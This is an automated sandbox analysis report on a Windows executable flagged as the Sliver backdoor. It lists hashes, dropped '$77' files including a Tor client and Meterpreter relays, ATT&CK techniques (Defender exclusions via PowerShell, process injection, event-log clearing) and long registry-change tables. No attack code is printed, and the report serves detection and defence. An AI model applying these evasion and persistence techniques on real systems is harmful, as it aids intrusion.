sliver | 8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2

Analysis

max time kernel
128s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
22-08-2024 01:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
Size

8.9MB
MD5

6e1f77d96601fc0e931fd355faaa373f
SHA1

a85772631a0c6d86c134c27e69fb19a433aa1729
SHA256

8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2
SHA512

defe1efd09e3ae0251382d9df051817fbcbbe9b6a6d4091537e05da7cf145b8b00fe2736f895a5a6b2fff0fb0c3e84882e90a62e096af5db6d22932de6398c11
SSDEEP

98304:pL6VwkcepYIOX3bQ3zhKRuJKI07NV2EwBLU71H/D8w/alW8zA+j83:EcepY3EDhKRuJZYYE1H/0zRS

Score

10^/10

sliver backdoor defense_evasion discovery execution trojan

Malware Config

Signatures

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral2/files/0x000500000001e746-1001.dat	SliverRAT_v2

SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4488 created 616	4488	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4324	powershell.exe
2488	powershell.exe
4488	powershell.EXE

Executes dropped EXE 7 IoCs

pid	Process
4464	$77tor.exe
4124	$77master.exe
4988	$77install.exe
2488	$77securerelay.exe
1596	$77beacon.exe
2528	$77securerelayMeterpreter.exe
2468	$77securerelayMeterpreter.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4488 set thread context of 952	4488	powershell.EXE	111

Drops file in Windows directory 7 IoCs

description	ioc	Process
File created	C:\windows\$77driver\$77beacon.exe	$77master.exe
File created	C:\windows\$77driver\$77securerelayMeterpreter.exe	$77master.exe
File opened for modification	C:\windows\$77driver\$77securerelayMeterpreter.exe	$77master.exe
File created	C:\Windows\$77driver\$77tor.exe	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
File created	C:\Windows\$77driver\$77master.exe	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
File created	C:\windows\$77driver\$77install.exe	$77master.exe
File created	C:\windows\$77driver\$77securerelay.exe	$77master.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8e3c8a67122bed24ce4a67ce7df0af3bf3b856dad467edd059c5afdbf46a6cf2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77tor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77master.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77beacon.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 55 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={426AAEAB-9667-401F-8C08-F5B952D4AA83}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1724291878"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 22 Aug 2024 01:57:59 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0aea7dcd-471b-4f06-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bdcce378-459d-4940-b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\162adac6-1fae-4d40-b = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\48d4fa83-d625-4b23-8 = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\df8b772704665936e1d2d6b39df3aa3a9e1b1038cccfaaa1e730dbe447056622"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d699b5aa-102b-4ada-8 = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbdb2ddb8ad0ab1ebe1819348ae984f3cdb172b0c05516bddd9c7ea98c65a6d7"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d699b5aa-102b-4ada-8 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8 = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ce5091ce997fca243cd949672c3a888938309acd1f5a087c19988e9117195b9e"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9499817c-c882-42c5-a	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b181e724-291a-4764-8	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\78bb8552-1536-44cc-b = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ce5091ce997fca243cd949672c3a888938309acd1f5a087c19988e9117195b9e"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\48d4fa83-d625-4b23-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\48d4fa83-d625-4b23-8 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\25c46d9e-e895-4257-b = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000089a4a9b936f4da01ca21caba36f4da01ca21caba36f4da01c97911000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001659420f2000643331323065343963313839363763363564313566376337663763393931396565376536613138646663323561376663343635303334363536623461636166620000b20009000400efbe1659420f1659420f2e000000000000000000000000000000000000000000000000009ad24800640033003100320030006500340039006300310038003900360037006300360035006400310035006600370063003700660037006300390039003100390065006500370065003600610031003800640066006300320035006100370066006300340036003500300033003400360035003600620034006100630061006600620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000edb8e7351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64333132306534396331383936376336356431356637633766376339393139656537653661313864666332356137666334363530333436353662346163616662000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000070766d6e756476640000000000000000cc2198eae58ba9489e53a10db429f6416a0c4c47d350ef119912da2e3a28ca1bcc2198eae58ba9489e53a10db429f6416a0c4c47d350ef119912da2e3a28ca1bce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700380036003200380034003200390038002d003600320035003400380031003600380038002d0033003200310030003300380038003900370030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000080ecc9f1000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8 = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\db7ebf4f-3e67-4a1b-9	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bdcce378-459d-4940-b = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\dbdb2ddb8ad0ab1ebe1819348ae984f3cdb172b0c05516bddd9c7ea98c65a6d7"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b181e724-291a-4764-8 = "\\\\?\\Volume{F1C9EC80-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\88f3777a7800453f8953d461f80504f6bbd527c39b45a9748aa23ed447788e8e"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d699b5aa-102b-4ada-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3a69627b-9c76-4af8-9	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\60a1b1c2-8c4b-4a52-8 = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000007e7da2b936f4da0196bc05bb36f4da0196bc05bb36f4da0131200b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000001659420f2000636535303931636539393766636132343363643934393637326333613838383933383330396163643166356130383763313939383865393131373139356239650000b20009000400efbe1659420f1659420f2e0000000000000000000000000000000000000000000000000037223800630065003500300039003100630065003900390037006600630061003200340033006300640039003400390036003700320063003300610038003800380039003300380033003000390061006300640031006600350061003000380037006300310039003900380038006500390031003100370031003900350062003900650000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000edb8e7351000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63653530393163653939376663613234336364393439363732633361383838393338333039616364316635613038376331393938386539313137313935623965000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000070766d6e756476640000000000000000cc2198eae58ba9489e53a10db429f6416c0c4c47d350ef119912da2e3a28ca1bcc2198eae58ba9489e53a10db429f6416c0c4c47d350ef119912da2e3a28ca1bce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003700380036003200380034003200390038002d003600320035003400380031003600380038002d0033003200310030003300380038003900370030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000080ecc9f1000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1ea56212-eab5-4dd2-a	RuntimeBroker.exe
